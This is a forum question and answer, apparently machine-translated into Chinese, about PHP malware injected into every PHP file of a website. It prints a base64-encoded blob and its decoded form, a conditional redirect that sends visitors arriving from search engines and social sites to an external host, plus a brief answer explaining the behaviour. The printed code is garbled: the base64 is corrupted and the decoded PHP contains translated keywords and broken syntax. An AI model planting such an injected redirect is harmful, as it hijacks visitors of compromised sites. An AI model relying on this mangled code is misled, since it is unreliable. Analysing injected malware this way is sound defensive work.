我从这个恶意代码中损失了多少


How much i have lost from this malicious code?

今年2月14日,我的网站受到了一些恶意软件代码的攻击,这在2月29日谷歌采取行动后引起了我的注意。但所有php文件在检查时都受到了恶意代码的影响。我得到了以下代码

回声base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnFc2VudCgpOw0KaWygKCEkcWF6cGXTKXsNCiRyZWZlcmVyPSRfU0VSkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9RVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0Ka WygKCR1YWcpIHsNCmlmIChzdpcHJ3RyKCRyZZlcmWyLCJ5YWhvbyIpIG9yHN0cml zdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Ig3RyaXN0cigkcmVmZXJlciwiZ29nbyIg9yHN0cmzdHIo JHJlzmVyZTIsImxpdmUuY29tIlvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0mlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3 RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0clzdhioJHJl ZmVy ZXIsImJlZ3VuLnJ1IikgB3Igc3 Rya XN0ciggcmVmZTJlciwic3R1bWJsZXVwb24uY29tIikb3Igc3 Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIikgbmVmZXjlckgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcickb3Igc3RyaXN0cigkcmVmZXjlciwbXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWnlYm9vay5jb20i KSBvcibzdHJpc 3yKCRyzWZlcm gkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGvIik7DQpleGl0KCk7DQp9DQp9Qp9DQp 9DQp9");

解码后变成

error_reporting(0)$qazplm=header_sent();if(!$qazplm){$referer=$_SERVER['HTTP_referer'];$uag=$_SERVER['HTTP_USER_AGENT'];if($uag){if(stristr($referer,"yahoo")或stristrstristr($referer,"live.com")或stristrstristr($referer,"nigma")或stristrstristr($referer,"started.ru")或stristr或stristr($referer,"bit.ly")或stristr($refer,"tinyurl.com"),或preg_match("/yandex.ru/yandsearch''?(.*?)''&lr''=/",$referer)或preg_match("/google.(.*?)/url/",$refer)或stristr($refer,"myspace.com")或stristr($referer,"facebook.com"),或stristr($referer,"aol.com"){if(!stristr($referer,"cache")或!stristr($referer,"inurl"){header("位置:http://namesti.bee.pl/");exit();}}}}

我不知道它是如何到达我的服务器的,但所有的php文件都受到了影响,但其他文件都很好。entire网站现在关闭了。我只是想知道它能造成多大的伤害,以及这个代码到底做了什么。我怎么能检测到它。它是在特定时间执行的脚本吗。

脚本只是尝试重定向到namesti.bee.pl,这取决于是否已经发送了标头,以及referer字符串包含什么。

它不会做任何其他事情,所以对你的网站声誉造成的伤害比其他任何事情都大。